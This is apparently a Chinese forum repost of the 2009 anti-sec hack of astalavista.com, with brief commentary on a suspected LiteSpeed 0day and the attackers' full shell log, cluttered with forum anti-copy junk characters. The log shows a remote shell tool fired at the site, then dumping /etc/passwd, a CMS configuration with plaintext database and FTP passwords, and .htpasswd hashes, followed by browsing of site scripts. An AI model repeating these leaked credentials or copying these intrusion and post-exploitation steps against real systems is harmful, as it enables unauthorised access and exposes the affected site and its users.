里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
# S3 q) N, F: {# e' ~
) F$ c# M- x7 a; s3 a[root@front3 ~]# curl -I litespeedtech.com/ q9 m1 b% c$ e- q% _( t
HTTP/1.1 200 OK
* B- a& E) p! T9 gDate: Fri, 05 Jun 2009 22:54:51 GMT
! E* O6 a9 Q5 P; p4 i( uServer: LiteSpeed' D3 C. w, a3 P. L# |" l
4 h- g* z2 a$ J0 }另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-7 M* z9 F! Q8 p" D
: D: y- T0 \' {) T; u- I有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。( g" k, o6 U) R& l' o) v
& Q& g( p5 N- t! \2 q8 Y Q. ~; c i
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ & } x' Q( }; X& J# t: E, M) h* w
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \$ x6 r+ w0 |+ G2 l) c' L2 S5 G1 X
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
X9 x6 {2 y3 q& H- d\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
0 }# r% _. h9 L3 P7 ?" R ^0 f \/ \/ \/ \/ \/ \/ \/: X# @8 U+ }8 o. B- `) D9 O
The Hacking & Security Community
3 Q, ?0 H& o! ]! b4 D' k[+] Founded in 1997 by a hacker computer enthusiast& q1 b) }; Y2 d( ?: c! N) k* S9 V
[-] Exposed in 2009 by anti-sec group
" `6 e2 e( o1 i6 t# V* D; R- r9 b$ c2 b1 r: V5 ?. H6 R
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:- v7 G$ e% F: v
>> 03. Who’s behind the site?
3 I1 m/ c" S0 B* O# K g" p) l>>6 k# `$ p- z- L b
>> A team of security and IT professionals, and a countless number of contributors from all over the world.: w3 j4 y! Y- v
/ o& t/ C1 G1 j6 o
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?2 G/ x6 v0 @7 p/ o: p
>>% g. K6 l; u+ w% j! M
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
$ Y2 {" N' L+ C# t) vmilitary institutions.
; o& T% D, E% J6 H5 l- g% w" d8 o>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
/ Z. \ @4 E. F- D& o" s, U6 j$ S( E, B* R* a7 z Y
Why has Astalavista been targeted?2 w p- z6 B G( l/ z/ n
: }2 _1 z1 c1 m0 l: G9 L% V$ p; q
Other than the fact that they are not doing any of this for the “community” but
/ m( \7 W7 x$ }. I5 g& r9 h0 Cfor the money, they spread exploits for kids, claim to be a security community
% _0 z1 v$ S1 q( ?. N& s(with no real sense of security on their own servers), and they charge you $6.66: O* E) f, t" ~$ B7 X
per months to access a dead forum with a directory filled with public releases) e3 p" _! j; d: {% S# [. l4 ]
and outdated / broken services.& ~& u* _3 `- U6 {: O/ a/ K0 g
7 z& f2 @- m1 D2 J* f
We wanted to see how good that “team of security and IT professionals” really is.
) `! Y5 N7 y1 I, Q' E& u0 O) J+ a3 b, T1 i# _' y* ?
Let’s begin.
$ u( w2 U+ ^3 s$ [' g5 Q% A# c9 j6 u S7 j4 u
anti-sec:~# ./g0tshell astalavista.com -p 80
4 ?4 C) X2 A& L% W; Z4 S( h: ] K[+] Connecting to astalavista.com:80
* d9 j+ j7 m! w7 I2 F[+] Grabbing banner…8 b$ q* n! E5 Z' E
LiteSpeed0 z6 I" d5 W6 r$ t9 O
[+] Injecting shellcode…8 J% l/ U8 y7 V& O
[-] Wait for it
. `! q+ p: Y# l) c1 o& c8 h& n
, P! o/ ?! m) O1 e9 v" r[~] We g0tshell
! f& ^9 x& ?: Y3 g2 C9 |uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux3 W" q+ z4 V) N9 j
ID: uid=100(apache) gid=500(apache) groups=500(apache)
5 H* Y* p0 F# }5 _3 m9 H
5 f- M; c& H7 L5 m3 o, A5 `! ish-3.2$ cat /etc/passwd
0 W. ~4 k/ B7 B! {) Rroot:x:0:0:root:/root:/bin/bash. r* Q2 @' [! P( W
bin:x:1:1:bin:/bin:/sbin/nologin
& O) O% ^$ i5 r4 {+ o! ~, P& ldaemon:x:2:2:daemon:/sbin:/sbin/nologin8 @! _& `8 L) n. V% H
adm:x:3:4:adm:/var/adm:/sbin/nologin8 w' D3 C j# o# a/ w' w* v7 {6 V
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
5 m' {! V/ |, O+ hsync:x:5:0:sync:/sbin:/bin/sync" l+ Z! H& y; v; ~, J. R8 B% ]
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
9 i! O. ^/ T3 I; V, Ihalt:x:7:0:halt:/sbin:/sbin/halt
3 U) J/ [; [- ^: m0 fmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
" n/ W3 m p- G9 E: u$ unews:x:9:13:news:/etc/news:
8 m/ f$ |4 |4 `3 Puucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin. M% b8 i0 t% w3 M+ S+ S
operator:x:11:0 perator:/root:/sbin/nologin
* n3 f( m4 H% {2 e3 Q( kgames:x:12:100:games:/usr/games:/sbin/nologin2 y" i" h0 H4 O! x' E; k5 H
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
0 U9 g1 V& p) ~3 `ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+ r+ v+ j( d& vnobody:x:99:99:Nobody:/:/sbin/nologin
4 {/ ?! y$ _# o$ A H! }rpm:x:37:37::/var/lib/rpm:/sbin/nologin
/ g$ @4 J4 f0 c& f g& ]dbus:x:81:81:System message bus:/:/sbin/nologin
) f) z* A% R$ V6 }nscd:x:28:28:NSCD Daemon:/:/sbin/nologin+ G j0 C: Q$ R" J
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+ j3 K. z W1 n4 ?5 y0 |2 s. esmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin/ ~. _5 ^. Y5 j5 M4 }( c
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin8 Z) ], O2 \' b1 [% q% y" H0 Q
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
8 B) K1 n+ _2 b9 H J* e' R/ s) Krpc:x:32:32 ortmapper RPC user:/:/sbin/nologin! {/ U. C7 N! ^; x/ h7 M& s; d7 J
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
9 e H2 t5 g" L4 d8 I) ~nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin, @8 l: P3 ~, N5 p, K7 E
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin* T) `( {( C5 c- W3 u
pcap:x:77:77::/var/arpwatch:/sbin/nologin2 b2 [# a6 n: k: L' l$ _
named:x:25:25:Named:/var/named:/sbin/nologin
: D! F5 V, g% g. r1 xapache:x:100:500::/var/www:/bin/false
. Y# m4 x% c- V( h! w8 o6 u Zdiradmin:x:101:101::/usr/local/directadmin:/bin/bash' F. l0 r& _) ^7 y
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
# D/ H# T2 f5 N$ hwebapps:x:500:501::/var/www/html:/bin/bash
$ H3 e" M, U! H$ pmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash/ e. B% h2 o! z4 x3 W
admin:x:501:502::/home/admin:/bin/bash" P: t; ]+ h% y) A3 E: y. W/ L
jon:x:502:503::/home/jon:/bin/bash
# @$ T) y# N( W2 R! d' x gcom:x:503:504::/home/com:/bin/bash
1 y1 R; C0 D0 m5 Wntp:x:38:38::/etc/ntp:/sbin/nologin
! I" [4 C; }3 B) w! v$ i' s- w) X. l6 Hais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
. p: O! e* o# @* L" B% pastanet:x:504:505::/home/astanet:/bin/bash( g9 ~7 `6 j: h: S& k
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
# R( p6 p4 `& M5 ~avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin+ o# M! }; m' a9 j3 R% C3 V
% U! l( u( \ w6 A
sh-3.2$ cat /etc/hosts
8 ?) I8 w; v# O. u K& F( I# Do not remove the following line, or various programs5 I6 D0 P, J+ Q& k+ l( S
# that require network functionality will fail." i' j# b7 C$ F3 J+ {9 K# j0 `
127.0.0.1 localhost.localdomain localhost& V4 x' c2 E5 x' W3 i$ l; U
::1 localhost6.localdomain6 localhost6
+ u( R4 f6 |: ^80.74.154.172 asta1.astalavistaserver.com/ d( W- S1 A1 g3 D& U* J: Q5 k
/ s2 U1 [' M" a2 Fsh-3.2$ pwd
& r& s. B9 J7 }/ ~/home/com/public_html0 w. w G3 `4 `, A0 s% o3 f
0 V7 O5 M' X6 {" Z- C5 [; ^9 G
sh-3.2$ ls -la- a6 k0 \7 N$ T9 ?. m7 I( o. y6 V
total 18460! h! k4 v5 h' V: r. r
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
' F% @3 p8 u8 }# j- Vdrwx–x–x 11 com com 4096 Jun 25 2008 ..
4 g6 Z( G) z" P) ~0 Ndrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
; Q! t- R2 s( {# O4 @" J+ U; Gdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache' T5 ^: r% ^2 _
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin- a M1 k. O3 j7 L3 Q* j* F
drwxrwxrwx 2 com com 4096 May 19 00:50 config; t8 b7 K: Y4 h- i+ E1 ]6 d$ F
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
! J5 z$ m0 H& Odrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
- D9 W0 q* B+ S; n0 \9 idrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
f7 Q1 f" n+ Odrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo0 u" p. v/ t. X! O/ H8 X! V( h
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
; G2 }. w0 v% G-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php$ m5 E/ }5 S# q& j/ h& q% R) L& H
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd) ~- Y' h2 B2 C6 T
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
) V4 ?' p% w7 [4 c" O% q) S-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
- e5 \: X5 \, P. N; y; G, tdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
3 ~2 C, J* G+ `- h2 [5 E-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
1 z! P- l/ I# R& x$ B-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak* Z6 S) [! O, {+ }8 x5 c6 F$ [
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
2 R$ {! w z1 s% K7 ddrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool* G3 h, l3 \( h' G! v( F! |
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images& y. @& Z$ N* A8 P& O1 g% D6 }
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
& K- e( K0 ~0 \4 G# E& mdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
/ ?, Q9 N1 I7 U( Fdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
- ^8 {' u1 R2 y' fdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib+ ~ c R8 m) U8 A8 m; `9 e
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media' x, Z% Z: i& G7 F9 H, N6 Y
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
" S& O9 j# z9 G5 B9 X) ?7 jdrwxr-xr-x 34 com com 4096 May 28 16:30 modules8 ]: _3 @7 h( i; [6 Q: o* q
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
/ c* ]* Z/ J8 L" R1 G. tdrwxrwxr-x 22 com com 4096 May 28 17:06 _new/ a% A, U e% t' j
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
0 e) u, A$ G8 idrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
2 ~4 ?1 }) g& K- x$ N8 Sdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy. u9 R9 ~# ~& l+ ^: t
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
# N5 X$ }: _0 a- H8 Y-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml4 `* J' I" l# }6 K6 S. b9 [% e5 t
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
9 i- W3 K4 b. s- w* r) Tdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
" w9 j3 b' l. A3 ?% \% A% Mdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp/ W- t! D, N7 r+ z) P( Y
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam- u5 O/ @, Y! i) `9 I
U6 x5 ]' O; b4 Z! w; I
sh-3.2$ head -20 index.php
j) x/ h' \, {0 i2 @<?php
# r4 p$ t1 _! F w3 _
9 C* U( J9 p8 T" B' r' m: V# q/**
6 y9 a6 r7 Y7 h1 }: I6 P" y3 ~+ T* The main page for the CMS
# d7 r5 M/ E8 k; M* @copyright CONTREXX CMS - COMVATION AG
+ [) ~" y+ A8 i* @author Comvation Development Team& ]6 |5 M# p$ I, A L
* @version v1.0.9.10.1 stable3 ~4 j& c) w/ m0 i# A2 ~
* @package contrexx. D# |* D" O# f
* @subpackage core
; c) @! B0 L/ m5 b( `* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
6 c+ i% k4 W% v" J& S* @since v0.0.0.0% a& j# c7 @ u0 H* W
* @todo Capitalize all class names in project6 c2 r+ V. r6 g
* @uses /config/configuration.php
, K- n/ e9 f. w e- I* @uses /config/settings.php+ l8 Q# l8 \$ U* e" N
* @uses /config/version.php
& q. x& a# M% W" E; T0 Y' c* @uses /core/API.php9 ]3 D/ f3 w; M4 T& d! Q# o
* @uses /core_modules/cache/index.class.php/ [' g1 v6 K- m6 P. R0 ?! s
* @uses /core/error.class.php# v, W; k, ?4 s7 `" [( T$ p
* @uses /core_modules/banner/index.class.php$ {4 F, ~$ ]1 {4 v1 i b8 c
* @uses /core_modules/contact/index.class.php" R% ?& O6 D+ B# m
' X) q# Y4 C4 p% |sh-3.2$ cd config/7 ~- q1 c4 ~: ^6 k' I% S* g/ I
sh-3.2$ ls -la
- k) Q* V% F- ~! Stotal 32
* L: R( S8 p( j& a, |. ^% Ddrwxrwxrwx 2 com com 4096 May 19 00:50 .
' K2 H) ?, X3 l% D. y; |, a' b/ a" M. Mdrwxr-xr-x 30 com apache 4096 May 28 17:06 .., g, c1 J2 \8 v: Y5 {+ c# o
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php0 x* p6 g& J5 s) ?$ a% ~. Z' [, O) G
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
2 t& V( \5 p# T$ i5 [ x-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php& o m! Z5 k' l) ^+ V) {5 v+ G
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php4 ^7 Z2 m5 v' s0 b2 K
$ |$ p/ z+ l: X' E
sh-3.2$ cat configuration.php
8 d8 z9 I# P2 Z8 O6 v[snip]" L- p: v$ ]' C8 ^- }
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost, N3 S% @6 t0 h
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name0 }4 \) R% d; j# k+ s8 c- z# E
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix, P8 n) {: T( }6 |
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username0 a: _" f- Y2 g1 }! I3 O# D: p
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password+ X* A! c$ ?6 D! B% O! W% c0 e8 J
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)" U* R; O1 K/ p0 W/ }! P
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
7 B0 I& X( k+ \% e) W[snip]) E& s8 z T7 |0 t) ?
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
) B1 B+ j' @: ?4 {7 G- L9 s/ _$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
+ c; ~6 r* y7 ] `: y! E: T9 F$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
0 K' \1 Z0 R. G4 q: E+ }) B9 i$_FTPCONFIG['port'] = 21; // Ftp remote port
, c5 F* b! c9 K1 b$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username9 T9 a) a" D& B' ^+ A6 r: v
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password/ K0 n0 G5 {, o/ z: G" Q; a
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
( W0 I+ m. C; V, [, m
5 P! T; l9 ^1 V! U4 Psh-3.2$ cd ..
r$ U& h: \: I; vsh-3.2$ cd dvd/' l: c, m- L {+ }
sh-3.2$ ls -la
7 D) f4 [! m. {, {" ytotal 2913780
; W& E. r7 P8 R+ i" Gdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
; p8 V8 Y2 r* M9 V0 \drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
! C% N* L7 U }2 U-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
5 L1 T A$ i) Q& f) G8 K-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
: `! I. I- s t1 W4 q-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar2 ^8 l, {# O, N1 Z% O& G M% ~* O
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess$ V3 M, G" Y0 u' r3 h' x
3 h8 \8 S8 {, ~
sh-3.2$ cat .htaccess
( d0 A% _& j3 t) jauthType Basic
! p v% G+ L z' }4 j" V( [authName DVD6 c6 C6 W2 f$ s. t0 [
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
$ G+ H& _5 \5 q( C7 hrequire valid-user
( r" X1 I9 \9 R9 U: q$ ~0 K, t0 D9 r( o& f! u" `+ g
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
* n+ t+ K1 W5 x8 ~DVDdownload:CRD8cuY6.MPT6/ V; [: x$ {( A
DVDdownload2:CR8a36.wluFMg
( g* k6 D$ L7 Y( l7 [5 o$ t2 L! K5 R& q; Q4 n! N& X9 t
sh-3.2$ cat test.php
/ h9 B( P5 H3 @3 [3 V<?php) a. n: Z% K, w4 W4 F
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;5 p( ~. r9 ?. G! F1 x
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
# }+ e+ g& F, X0 K5 G8 q3 [! Q J7 Vecho $url;
2 N9 e8 g+ I$ T4 _1 Q3 l. e% ~?>
+ _- P7 E. E! j1 d7 Z
0 X7 Z$ |; h$ a5 Y. Q9 @sh-3.2$ cd modifications/$ N S) m% d) i U- h( u
sh-3.2$ ls -la
* L0 n( m6 W2 V# Ktotal 32
8 `+ J7 a: j* ^' Z( ldrwxr-xr-x 8 com com 4096 May 11 12:48 .
3 K5 P: v' O3 O5 \drwxr-xr-x 30 com apache 4096 May 28 17:06 ..- W+ {; _0 [, q/ J# k! S# ^) b
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng# u/ A- T7 X! ]1 J
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
' ^% G+ |( L5 ^/ ?( W7 ]drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools; Z- q/ T6 }1 ~% S
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc# ?( C3 k1 p- X
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search0 [ X2 R$ V% w1 X' A
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
w8 H6 g# _8 ~) {* x" s4 D5 e& T i2 `# Y& v) A/ Y) B6 O
sh-3.2$ ls -R
7 a, {0 I# J! M. o.:- L/ h; r0 ~( e2 {
com_avtng cronjobs onlinetools pjirc search _tmp$ A% P7 B' z4 D7 J/ I! @( ^
1 ^7 I% s$ f3 F6 v
./com_avtng:. w- t5 [! \/ E5 A
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts2 e4 B, z. C& j9 \: D* K! `
3 h8 l9 `) t- j9 `6 T# ^./com_avtng/scripts:9 _% S7 T+ C @) x; }& l
popunder.js
- D' L/ W& X# q4 j
$ i( e8 `# d( d5 i./cronjobs:
) J* D+ [9 d: v0 v0 Aexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp }. C4 }* V" k2 R2 l! w
E& r# e ]% p" s
./cronjobs/tmp:
" x7 a- V/ s+ B r, I5 }, n: pcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
2 s9 \. g( b( D k1 z
2 g0 w0 f7 a- q) t- O./onlinetools:5 D; F1 ?# V% t6 S) x3 |0 M$ x
index.php, ?! s' d: o! ?9 G; C
' `0 p& a! j. p6 S3 r, F; e) X) L# O./pjirc:
9 E9 v) e4 f2 k% o+ }a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
+ Z. `0 J F9 VAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt) S5 @$ U# d/ @6 v0 }
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd% _; N% s" m% Q2 Q/ Y; a
# X6 J7 z& |. I5 k8 X# S$ {: _* l& {2 F./pjirc/img:- @( {" O: f+ Z& c
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif; M- ?1 X/ ]- p* p# q" \
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
& }; I9 d( K+ yverre-eau.gif
! t( _) @( i1 Q7 [5 e9 f9 ?5 m) Hargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
% K3 n6 c" T+ Z8 ]verre-vin.gif
, s8 ^ L7 s" ?0 U6 ?ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif) D9 \+ v( A8 o0 ?6 o
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif2 j8 F( T. ^- [' V# X$ G y: T
" _3 W( w, h2 ]& X./pjirc/snd:
- F2 v, _& [$ m" O! Cbell2.au ding.au
# N& j/ R9 J. ?2 {
5 ^8 y- W$ Y: k5 Z8 T: U./search:
4 g, ]( N* t2 B8 B! a; ]- TsearchEngines.php search.php
5 I. W1 f, w0 w! I( r3 p) S* V, K8 k: s1 b6 G, D/ X7 o
./_tmp:9 B& J+ R+ O- E
defaultPorts.php defaultPorts.txt
3 ~! y7 N% n( j* y3 \. A! n+ z& F9 t, [1 U
sh-3.2$ cd cronjobs/- h* B5 P0 B {% u" a
sh-3.2$ cat exploits.php. j/ X |2 I; Z/ y$ T H
[snip]
/ f+ t' j2 N7 V" E9 E$categories = array();
4 { M1 U e5 ]% r6 s0 `$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;' Y( z( k: c+ O& d- y9 b8 b! n. U
$expolits = file($milw0rmFile);* {# {# C( l$ }
$comExploits = array();
5 u2 r# G2 P0 E) a[snip]8 p& O6 T+ L4 C: z
// manage data! G: ?; a+ l+ v# P
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
( r8 S& M6 l+ L3 N) O6 w$ @7 K3 [! _! ^, ~& z. r. ?- d. i5 @7 x# x
// get path and title
; ?- g/ E* X/ B& F $expolits[$x] = trim($expolits[$x]);( t- X8 ~8 T4 y. |/ f
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
& ~+ b" ?. G* P3 Z/ s( m" W+ }4 L $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);% p. \# \" u( j" `# c
( z( V J* i2 |; ^) S' E
// check if file exists
/ u$ i0 I: r1 \1 O if (file_exists($path)) {
% Q/ \- c, f0 U& r
% M# b; v( D, S* f; k7 O% b $text = file_get_contents($path);* Y' M7 Y% J& z$ R! \2 [1 @
& w" w6 z& ^# Z7 A. J( X
// get content and date
9 X6 y+ _9 a. X //$text = htmlspecialchars($text, ENT_QUOTES);1 |8 ~. G+ {, e" Y
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));) j2 r, w; G" d0 K+ n
if ($tmptext != ”) {
4 p1 U ]7 f8 \# `# V $text = $tmptext;, b2 k; ~) c2 i) `, x
} else {
: U4 z9 b- e3 e* W0 F* \/ _ $text = addslashes(htmlentities($text, ENT_QUOTES)); ^; X0 E& R7 s F6 O
}
( U8 j1 u: ^6 y: s& N; S1 d $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));7 n/ h+ |/ @. `6 a$ |- q
$tmp = explode('-', $date); b& t0 N/ Q7 g# J- Y6 n& w) {8 m
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
( c m' W, E/ y$ u1 ]& Q/ [% r, \ $cat = getCategory ($path);+ K7 J' A# _7 T
$ext = pathinfo(basename($path));$ X( }$ X' W/ {) y: H/ o
$ext = $ext['extension'];5 y( F$ t# y- ^+ l d! @
$qStr = ”: \3 |9 a+ D) n: a
SELECT `id`
3 a) e4 d$ R& s6 }" y1 s1 H, l& j FROM `contrexx_module_exploits`
3 E) x/ o u! x WHERE `title` = ‘” . $title . “‘- J2 R6 C& k" ~
AND `date` = ‘” . $date . “‘# }( O* S7 ^9 F% t/ f
“;
$ {/ ^, ^7 g/ z( h' Y" S! T! d& r echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
8 y, p* s# A9 @; [: [6 \9 [ $q = $_objDB->query($qStr);4 n* W0 f+ D; s! c* p, Z; {
: S7 o% p' x5 s" N; r& X
if ($q->numRows() == 0) {% W2 i# z8 L! U, N
: N+ N$ `" Z1 y2 N& @. N* a- P
// prepare array
" l0 q6 u3 g7 Q% W9 W6 V $comExploits[$x]['date'] = $date;
' o9 g/ F1 D& X) g. v) K8 `+ T $comExploits[$x]['title'] = $title;
/ P6 u& H' {3 x% b( ]' D+ \* | $comExploits[$x]['author'] = ‘milw0rm’;
# Q% ^- r. |! y: p1 y $comExploits[$x]['text'] = $text;! S$ t7 Z, w# O' c( B7 E
$comExploits[$x]['source'] = $ext;9 C1 n6 b4 L9 A+ j2 g
$comExploits[$x]['url1'] = ”;, m. s3 C* @/ g
$comExploits[$x]['url2'] = ”;: @: V& ~9 H" @0 x
$comExploits[$x]['catid'] = $cat; \& H( t' G4 }3 c% x5 m* B
$comExploits[$x]['lang'] = ‘2′;) }( D" A1 O+ ]8 X& G- W
$comExploits[$x]['userid'] = ‘12′;
% b# g1 T8 Y" F# q ]# d $comExploits[$x]['startdate'] = ‘0000-00-00′;4 u6 W; h, z, W9 D1 }: Q$ c
$comExploits[$x]['enddate'] = ‘0000-00-00′;
! O _8 y7 ^$ C# V* n $comExploits[$x]['status'] = ‘1′;
# p3 V6 O% J9 k) u8 O) U$ c8 s $comExploits[$x]['changelog'] = $date;
6 n1 F9 c& ]" S* y
1 [2 |) e9 }! N6 P, d }" m* q. |/ y! k4 }% p. u8 C
[snip]$ v. E9 y9 ^4 D* p6 ?) w
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
# b4 ]1 f: H/ E# ~<rss version=”2.0″>& T ]) V( y* a( Y9 B& Q3 W
<channel>2 _. V$ B! m4 W5 n- ?' N
<title>ASTALAVISTA.com - Exploits</title>
0 C+ ^! b" ~% x <link>http://www.astalavista.com/exploits</link>3 H! s! {# D6 b+ Z, p
<description>All availably Exploits.</description>9 B& {' n' d; e- v/ n
